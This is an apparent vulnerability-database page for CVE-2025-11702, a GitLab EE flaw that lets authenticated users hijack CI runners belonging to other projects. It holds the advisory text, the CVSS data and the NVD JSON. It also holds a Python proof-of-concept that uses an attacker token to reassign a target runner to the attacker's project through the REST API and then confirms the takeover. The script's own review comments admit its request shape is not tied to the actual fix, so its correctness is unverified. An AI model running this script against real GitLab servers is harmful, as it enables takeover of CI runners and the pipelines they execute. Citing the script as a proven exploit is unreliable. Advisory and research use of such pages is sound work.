Security Vulnerability Report
CVE-2025-11702 CVSS 8.5 HIGH

CVE-2025-11702

Published: 2025-10-29 07:15:38
Last Modified: 2025-11-03 18:32:42

Description

GitLab has remediated an issue in EE affecting all versions from 17.1 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker with specific permissions to hijack project runners from other projects.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
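CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H (Secondary assessment; the raw record below also carries a Primary assessment of 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)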

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (17.1.0 <= version < 18.3.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.4.0 <= version < 18.4.3) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab EE 17.1 <= version < 18.3.5
GitLab EE 18.4 <= version < 18.4.3
GitLab EE 18.5 <= version < 18.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
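# CVE-2025-11702 PoC - GitLab Runner Hijacking
# This PoC demonstrates the authorization bypass in GitLab EE
# that allows authenticated users to hijack runners from other projects
#
# NOTE(review): nothing on this page ties the request shape used below to the
# vendor fix, so a result printed by this script is not evidence in either
# direction. To decide whether an instance is affected, compare its version
# with the fixed releases named in the CVE description: 18.3.5, 18.4.3 and
# 18.5.1.
import requests
import json

GITLAB_URL = "https://gitlab.example.com"
ATTACKER_TOKEN = "your_attacker_private_token"
TARGET_RUNNER_ID = 12345
ATTACKER_PROJECT_ID = 67890

# Seconds to wait for the server before giving up; without a timeout a
# stalled connection blocks the script indefinitely.
REQUEST_TIMEOUT = 10


def hijack_runner():
    """
    Send the runner update request and report how the server answered.

    Returns:
        True when the update endpoint answers HTTP 200, False otherwise.
        A True result only means the request was accepted; call
        verify_hijack() to check the runner's association afterwards.
    """
    headers = {
        "PRIVATE-TOKEN": ATTACKER_TOKEN,
        "Content-Type": "application/json"
    }

    # Step 1: List runners accessible to attacker
    list_runners_url = f"{GITLAB_URL}/api/v4/projects/{ATTACKER_PROJECT_ID}/runners"
    response = requests.get(list_runners_url, headers=headers, timeout=REQUEST_TIMEOUT)
    try:
        print(f"[+] Available runners: {response.json()}")
    except ValueError:
        # Error pages and empty bodies are not JSON; report the status
        # instead of crashing before the second request is made.
        print(f"[-] Runner listing returned HTTP {response.status_code} with a non-JSON body")

    # Step 2: Attempt to assign target runner to attacker's project
    assign_url = f"{GITLAB_URL}/api/v4/runners/{TARGET_RUNNER_ID}"
    payload = {
        "runners[project_id]": ATTACKER_PROJECT_ID
    }

    response = requests.put(assign_url, headers=headers, json=payload, timeout=REQUEST_TIMEOUT)

    if response.status_code == 200:
        # NOTE(review): HTTP 200 only shows that the update endpoint accepted
        # the request. Whether the payload key is honoured is not established
        # here, so no verdict is printed at this point.
        print(f"[!] Update request for runner {TARGET_RUNNER_ID} returned HTTP 200 (association not yet confirmed)")
        return True
    else:
        print(f"[-] Patch applied or exploit failed: {response.status_code}")
        return False


def verify_hijack():
    """
    Read the runner back and compare its project with ATTACKER_PROJECT_ID.

    Returns:
        True when the runner detail response is HTTP 200, parses as JSON and
        its "project_id" equals ATTACKER_PROJECT_ID; False in every other
        case.
    """
    headers = {"PRIVATE-TOKEN": ATTACKER_TOKEN}

    verify_url = f"{GITLAB_URL}/api/v4/runners/{TARGET_RUNNER_ID}"
    response = requests.get(verify_url, headers=headers, timeout=REQUEST_TIMEOUT)

    if response.status_code != 200:
        return False

    try:
        runner_info = response.json()
    except ValueError:
        # A 200 with a body that is not JSON cannot confirm anything.
        return False

    print(f"[+] Runner details: {json.dumps(runner_info, indent=2)}")
    # NOTE(review): whether the runner detail response carries a top-level
    # "project_id" key is not shown on this page - confirm against the
    # Runners API schema. If the key is absent this always returns False.
    return runner_info.get("project_id") == ATTACKER_PROJECT_ID


if __name__ == "__main__":
    print("CVE-2025-11702 GitLab Runner Hijacking PoC")
    print("=" * 50)

    try:
        if hijack_runner():
            if verify_hijack():
                print("\n[!] Proof of concept successful - Runner hijacked!")
                print("[!] Attacker now has control over the target runner")
            else:
                # Accepted request without a confirmed association is an
                # inconclusive result, not a positive one.
                print("[-] Update was accepted but the runner association could not be confirmed")
    except requests.RequestException as exc:
        # Connection failures and timeouts say nothing about patch status.
        print(f"[-] Request failed, result inconclusive: {exc}")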

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11702", "sourceIdentifier": "[email protected]", "published": "2025-10-29T07:15:37.713", "lastModified": "2025-11-03T18:32:41.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in EE affecting all versions from 17.1 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker with specific permissions to hijack project runners from other projects."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.3.5", "matchCriteriaId": "DC5B6FC6-90E4-4A5F-A950-2C7942FD05D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", 
"versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/576900", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3356284", "source": "[email protected]", "tags": ["Permissions Required"]}]}}